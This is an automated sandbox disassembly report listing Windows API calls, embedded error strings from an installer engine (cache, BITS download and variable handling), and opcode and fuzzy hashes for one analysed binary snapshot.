                                                                                                                • API String ID: 2001391462-1605196437
                                                                                                                • Opcode ID: 65282eafca51567f983356716bbfc13b221357e936bef517047370d5fcc2044e
                                                                                                                • Instruction ID: 87a9d4636e41b4bba3c275cf2fc58129480a92a5b8b957e76e36771707f939d9
                                                                                                                • Opcode Fuzzy Hash: 65282eafca51567f983356716bbfc13b221357e936bef517047370d5fcc2044e
                                                                                                                • Instruction Fuzzy Hash: D21127321802247AEF262DAD9C8AE9A3A58FF87720F044010F9106E2D2C6AACD1083E0
                                                                                                                APIs
                                                                                                                • _MREFOpen@16.MSPDB140-MSVCRT ref: 009A9E38
                                                                                                                Strings
                                                                                                                • Failed to set variable., xrefs: 009A9E97
                                                                                                                • Failed get file version., xrefs: 009A9E78
                                                                                                                • File search: %ls, did not find path: %ls, xrefs: 009A9EA3
                                                                                                                • Failed to format path string., xrefs: 009A9E43
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Open@16
                                                                                                                • String ID: Failed get file version.$Failed to format path string.$Failed to set variable.$File search: %ls, did not find path: %ls
                                                                                                                • API String ID: 3613110473-2458530209
                                                                                                                • Opcode ID: 18ab97fd35d35a4ba730eba5a8c72bd4900d8ae9165774b278e580b219af30e2
                                                                                                                • Instruction ID: 4db9c79f84ec3e3a6f5131832b99887e13363ba280288f1549c2ad8b3098631c
                                                                                                                • Opcode Fuzzy Hash: 18ab97fd35d35a4ba730eba5a8c72bd4900d8ae9165774b278e580b219af30e2
                                                                                                                • Instruction Fuzzy Hash: CB11D332D40169BBCF13AE998C429AEFB78FF95754F204166FD1466212D6325E5097C0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009A394F: GetProcessHeap.KERNEL32(?,000001C7,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3960
                                                                                                                  • Part of subcall function 009A394F: RtlAllocateHeap.NTDLL(00000000,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3967
                                                                                                                • CreateWellKnownSid.ADVAPI32(00000000,00000000,00000000,00000000,00000044,00000001,00000000,00000000,?,?,009B8E17,0000001A,00000000,?,00000000,00000000), ref: 009B8258
                                                                                                                • GetLastError.KERNEL32(?,?,009B8E17,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 009B8262
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$AllocateCreateErrorKnownLastProcessWell
                                                                                                                • String ID: Failed to allocate memory for well known SID.$Failed to create well known SID.$cache.cpp
                                                                                                                • API String ID: 2186923214-2110050797
                                                                                                                • Opcode ID: d577d4e9da667e12007cc107b992988c3497e181b503f752c4f43b3a54568620
                                                                                                                • Instruction ID: 8057a0b7d51dbd785046424ea7efed1f3568b64ca749a48222c830c45e04ed63
                                                                                                                • Opcode Fuzzy Hash: d577d4e9da667e12007cc107b992988c3497e181b503f752c4f43b3a54568620
                                                                                                                • Instruction Fuzzy Hash: 76010C33555A35B7D63166D94D06FAB7A5DDFC5BB0B114016FE24BB241EE748D00C2E0
                                                                                                                APIs
                                                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000003E8,000004FF), ref: 009CDDCE
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 009CDDF8
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,009CDFC8,00000000,?,?,?,?,00000000), ref: 009CDE00
                                                                                                                Strings
                                                                                                                • Failed while waiting for download., xrefs: 009CDE2E
                                                                                                                • bitsengine.cpp, xrefs: 009CDE24
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastMessageMultipleObjectsPeekWait
                                                                                                                • String ID: Failed while waiting for download.$bitsengine.cpp
                                                                                                                • API String ID: 435350009-228655868
                                                                                                                • Opcode ID: f179a545be99f1525ccab0fdd4c0989774973da48c10747da001ff31af12aabb
                                                                                                                • Instruction ID: 5a7b3f137dde321ce8c86e960b763e6b94c32719ee2401276152c994b0ea1c3c
                                                                                                                • Opcode Fuzzy Hash: f179a545be99f1525ccab0fdd4c0989774973da48c10747da001ff31af12aabb
                                                                                                                • Instruction Fuzzy Hash: 4B11C673E4623577D7205AA99C49FABBA9CEB05761F000139FE05FB1C1D6649D0081E5
                                                                                                                APIs
                                                                                                                • GetComputerNameW.KERNEL32(?,00000010), ref: 009A5F5C
                                                                                                                • GetLastError.KERNEL32 ref: 009A5F66
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ComputerErrorLastName
                                                                                                                • String ID: Failed to get computer name.$Failed to set variant value.$variable.cpp
                                                                                                                • API String ID: 3560734967-484636765
                                                                                                                • Opcode ID: f7a2c7eb91932cd3de5610a0997bb7bdda029f058f8ed3fe7f4f1d352f9e2e17
                                                                                                                • Instruction ID: 0569e20840bb2bf9c51ffb80ad2a570120e219ed91dad8446d799ed1fc55276c
                                                                                                                • Opcode Fuzzy Hash: f7a2c7eb91932cd3de5610a0997bb7bdda029f058f8ed3fe7f4f1d352f9e2e17
                                                                                                                • Instruction Fuzzy Hash: 6F11E933B45568AFC721DAA59C05BDEB7E8AB49720F120016FD00FB280DA75AE0486E1
                                                                                                                APIs
                                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 009A67E3
                                                                                                                • GetLastError.KERNEL32 ref: 009A67ED
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastPathTemp
                                                                                                                • String ID: Failed to get temp path.$Failed to set variant value.$variable.cpp
                                                                                                                • API String ID: 1238063741-2915113195
                                                                                                                • Opcode ID: b2d74e06dd33329059d8286f08156a255c211f9ffe8e6d1521576c37e854dacd
                                                                                                                • Instruction ID: a20f42a9909784adc5f5829dcdca50447e89fa8c4740780134e28cbb4d02f606
                                                                                                                • Opcode Fuzzy Hash: b2d74e06dd33329059d8286f08156a255c211f9ffe8e6d1521576c37e854dacd
                                                                                                                • Instruction Fuzzy Hash: 14014972E41339A7D721EB985C06FAE739C9F41B10F110165FE14FB2C2EB68AD0086D1
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 009A5EA6
                                                                                                                  • Part of subcall function 009E0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,009A5EB2,00000000), ref: 009E0AE0
                                                                                                                  • Part of subcall function 009E0ACC: GetProcAddress.KERNEL32(00000000), ref: 009E0AE7
                                                                                                                  • Part of subcall function 009E0ACC: GetLastError.KERNEL32(?,?,?,009A5EB2,00000000), ref: 009E0AFE
                                                                                                                  • Part of subcall function 009E3D1F: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 009E3D4C
                                                                                                                Strings
                                                                                                                • Failed to set variant value., xrefs: 009A5F0A
                                                                                                                • Failed to get shell folder., xrefs: 009A5EDA
                                                                                                                • Failed to get 64-bit folder., xrefs: 009A5EF0
                                                                                                                • variable.cpp, xrefs: 009A5ED0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressCurrentErrorFolderHandleLastModulePathProcProcess
                                                                                                                • String ID: Failed to get 64-bit folder.$Failed to get shell folder.$Failed to set variant value.$variable.cpp
                                                                                                                • API String ID: 2084161155-3906113122
                                                                                                                • Opcode ID: 8140f70f2e743907cd85a327a25a2f3c46e76e4e390d717df150474946b3dc20
                                                                                                                • Instruction ID: 8460472f2dc7af057c8ae03c0315d5cb34313e851b91ace663ae968739ed0920
                                                                                                                • Opcode Fuzzy Hash: 8140f70f2e743907cd85a327a25a2f3c46e76e4e390d717df150474946b3dc20
                                                                                                                • Instruction Fuzzy Hash: B701D632A4566CBBCF23A791CC0AFAE7A6CAF41724F214151F800BA181DB749E40D7D1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009E4440: FindFirstFileW.KERNEL32(009C923A,?,00000100,00000000,00000000), ref: 009E447B
                                                                                                                  • Part of subcall function 009E4440: FindClose.KERNEL32(00000000), ref: 009E4487
                                                                                                                • SetFileAttributesW.KERNEL32(009C923A,00000080,00000000,009C923A,000000FF,00000000,?,?,009C923A), ref: 009E4182
                                                                                                                • GetLastError.KERNEL32(?,?,009C923A), ref: 009E418C
                                                                                                                • DeleteFileW.KERNEL32(009C923A,00000000,009C923A,000000FF,00000000,?,?,009C923A), ref: 009E41AC
                                                                                                                • GetLastError.KERNEL32(?,?,009C923A), ref: 009E41B6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
                                                                                                                • String ID: fileutil.cpp
                                                                                                                • API String ID: 3967264933-2967768451
                                                                                                                • Opcode ID: e928e40a6dec3d83d4ac41f66afde609bd8388aba17a18fc9949ab1cf0905ed2
                                                                                                                • Instruction ID: 9431f2a0c78f7bf0143093ddb8e58930f94ba13fabbf76f9ba92eab3e8cfc4e1
                                                                                                                • Opcode Fuzzy Hash: e928e40a6dec3d83d4ac41f66afde609bd8388aba17a18fc9949ab1cf0905ed2
                                                                                                                • Instruction Fuzzy Hash: 36014533A492B9A7DF330AAB8C44B5B7E9CAF307A2F010610FD04EA1D0D320CD80A1D0
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 009CDA1A
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 009CDA5F
                                                                                                                • SetEvent.KERNEL32(?,?,?,?), ref: 009CDA73
                                                                                                                Strings
                                                                                                                • Failure while sending progress during BITS job modification., xrefs: 009CDA4E
                                                                                                                • Failed to get state during job modification., xrefs: 009CDA33
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterEventLeave
                                                                                                                • String ID: Failed to get state during job modification.$Failure while sending progress during BITS job modification.
                                                                                                                • API String ID: 3094578987-1258544340
                                                                                                                • Opcode ID: f5a5b3fc3bf48cf887d713597217aa0c9769ea7cd4d53da2b1ac986f5a912fd6
                                                                                                                • Instruction ID: 9d98463f56817ac021b8f961b39c1c0698c38767a2916dae3c6a48b2ceb3e22a
                                                                                                                • Opcode Fuzzy Hash: f5a5b3fc3bf48cf887d713597217aa0c9769ea7cd4d53da2b1ac986f5a912fd6
                                                                                                                • Instruction Fuzzy Hash: A1019E72A0A629BBCB11DB55D899FAEB7ACFF54331B004269E905D7640DB30EE04CAD1
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(00000008,?,00000000,00000000,00000000,?,009CDDEE), ref: 009CDC92
                                                                                                                • LeaveCriticalSection.KERNEL32(00000008,?,009CDDEE), ref: 009CDCD7
                                                                                                                • SetEvent.KERNEL32(?,?,009CDDEE), ref: 009CDCEB
                                                                                                                Strings
                                                                                                                • Failure while sending progress., xrefs: 009CDCC6
                                                                                                                • Failed to get BITS job state., xrefs: 009CDCAB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterEventLeave
                                                                                                                • String ID: Failed to get BITS job state.$Failure while sending progress.
                                                                                                                • API String ID: 3094578987-2876445054
                                                                                                                • Opcode ID: 19d080c6d418254ec7600c1eb0b017cac5774b924bf730debe963cfe1df0a774
                                                                                                                • Instruction ID: 846ca815618b09f92cc816625a6d6374d1acb49593d14a6f00aeac101ff95a2a
                                                                                                                • Opcode Fuzzy Hash: 19d080c6d418254ec7600c1eb0b017cac5774b924bf730debe963cfe1df0a774
                                                                                                                • Instruction Fuzzy Hash: A801F172E06729BBCB169B45D889EABB7ACFF44320B00416AF90497650DBB0AD00CBD1
                                                                                                                APIs
                                                                                                                • InitializeCriticalSection.KERNEL32(00000008,00000000,00000000,?,009CDF52,?,?,?,?,?,?,00000000,00000000), ref: 009CD802
                                                                                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,009CDF52,?,?,?,?,?,?,00000000,00000000), ref: 009CD80D
                                                                                                                • GetLastError.KERNEL32(?,009CDF52,?,?,?,?,?,?,00000000,00000000), ref: 009CD81A
                                                                                                                Strings
                                                                                                                • Failed to create BITS job complete event., xrefs: 009CD848
                                                                                                                • bitsengine.cpp, xrefs: 009CD83E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateCriticalErrorEventInitializeLastSection
                                                                                                                • String ID: Failed to create BITS job complete event.$bitsengine.cpp
                                                                                                                • API String ID: 3069647169-3441864216
                                                                                                                • Opcode ID: 1d290daa30e952e48c8fc3319561d2ba915ac6f10ef1020ed0a6ebf1a68a03f7
                                                                                                                • Instruction ID: c8ff7b8f54f3760a52b65146ffe3cc65fc193a4d878ea26860961c0fad701719
                                                                                                                • Opcode Fuzzy Hash: 1d290daa30e952e48c8fc3319561d2ba915ac6f10ef1020ed0a6ebf1a68a03f7
                                                                                                                • Instruction Fuzzy Hash: 0F0192729116266BC3109B5AD845B47BFA8FF49770B00412AFE08E7640E7709800CBE5
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,009B7040,000000B8,00000000,?,00000000,75C0B390), ref: 009AD4B7
                                                                                                                • InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 009AD4C6
                                                                                                                • LeaveCriticalSection.KERNEL32(000000D0,?,009B7040,000000B8,00000000,?,00000000,75C0B390), ref: 009AD4DB
                                                                                                                Strings
                                                                                                                • userexperience.cpp, xrefs: 009AD4F4
                                                                                                                • Engine active cannot be changed because it was already in that state., xrefs: 009AD4FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$CompareEnterExchangeInterlockedLeave
                                                                                                                • String ID: Engine active cannot be changed because it was already in that state.$userexperience.cpp
                                                                                                                • API String ID: 3376869089-1544469594
                                                                                                                • Opcode ID: d496d38de3d33c1570e4748257812364e93de66cc63bfb4752f5250f8e5d4782
                                                                                                                • Instruction ID: b385f25f7ba9f35224d9aa4248017f80e9a67ff89e416ecb5f80583ea7edaa6b
                                                                                                                • Opcode Fuzzy Hash: d496d38de3d33c1570e4748257812364e93de66cc63bfb4752f5250f8e5d4782
                                                                                                                • Instruction Fuzzy Hash: C0F0AF32304348AF9B215EAADCC8D9777ACFBD6765300442AF612C7690DB74ED0587A0
                                                                                                                APIs
                                                                                                                • GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 009E1CB3
                                                                                                                • GetLastError.KERNEL32(?,009A49DA,00000001,?,?,009A4551,?,?,?,?,009A5466,?,?,?,?), ref: 009E1CC2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                • String ID: SRSetRestorePointW$srclient.dll$srputil.cpp
                                                                                                                • API String ID: 199729137-398595594
                                                                                                                • Opcode ID: 17d0e6d8da43470b7702f8cc3fa5806feab436add3fd3df0ba1538e9b83e7e68
                                                                                                                • Instruction ID: 86f8bcdc77b76d5ea64bbe5b927234f8fb7cd170c0af1ba6f4b34b683ae4b4ef
                                                                                                                • Opcode Fuzzy Hash: 17d0e6d8da43470b7702f8cc3fa5806feab436add3fd3df0ba1538e9b83e7e68
                                                                                                                • Instruction Fuzzy Hash: C401A937BD16BAA3C73357E76C05B5A66886B007A1F114122FD41EB2E0D736DC80D6E5
                                                                                                                APIs
                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,009D490E,00000000,?,009D48AE,00000000,00A07F08,0000000C,009D4A05,00000000,00000002), ref: 009D497D
                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 009D4990
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,009D490E,00000000,?,009D48AE,00000000,00A07F08,0000000C,009D4A05,00000000,00000002), ref: 009D49B3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                • Opcode ID: e852fb5247d535da9662f3a6473af3e838767c57d71e43c7c9bf34546c34bdd7
                                                                                                                • Instruction ID: 65934371fd42d78013dfe5e2f1de17da3d97c831bddf28afea0fa5717674198c
                                                                                                                • Opcode Fuzzy Hash: e852fb5247d535da9662f3a6473af3e838767c57d71e43c7c9bf34546c34bdd7
                                                                                                                • Instruction Fuzzy Hash: E7F04F34A5420CBBCB119FA1DC6ABAFBFB8EB04B52F004069F906A6290CB715D40DB91
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32 ref: 009B93C9
                                                                                                                  • Part of subcall function 009E56CF: GetLastError.KERNEL32(?,?,009B933A,?,00000003,00000000,?), ref: 009E56EE
                                                                                                                Strings
                                                                                                                • Failed to read certificate thumbprint., xrefs: 009B93BD
                                                                                                                • Failed to get certificate public key identifier., xrefs: 009B93F7
                                                                                                                • Failed to find expected public key in certificate chain., xrefs: 009B938A
                                                                                                                • cache.cpp, xrefs: 009B93ED
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast
                                                                                                                • String ID: Failed to find expected public key in certificate chain.$Failed to get certificate public key identifier.$Failed to read certificate thumbprint.$cache.cpp
                                                                                                                • API String ID: 1452528299-3408201827
                                                                                                                • Opcode ID: 1a73c292ce1570cb925683140a771bc0359015d3846b5761c3f2ff5bcf0d8fc7
                                                                                                                • Instruction ID: ad1201e1ad3698cbdf2b2558dc9a84fd67d9bed6320fdd6ca4d679adf31ee9d4
                                                                                                                • Opcode Fuzzy Hash: 1a73c292ce1570cb925683140a771bc0359015d3846b5761c3f2ff5bcf0d8fc7
                                                                                                                • Instruction Fuzzy Hash: A1414072E14619ABDB10DBA9C941AEEB7F8AB48724F054029FA05E7291D774ED00CBA0
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(8007139F,00000000,?,?,00000000,00000000,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A21F2
                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A21FE
                                                                                                                  • Part of subcall function 009A3BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,009A21CC,000001C7,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3BDB
                                                                                                                  • Part of subcall function 009A3BD3: HeapSize.KERNEL32(00000000,?,009A21CC,000001C7,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3BE2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
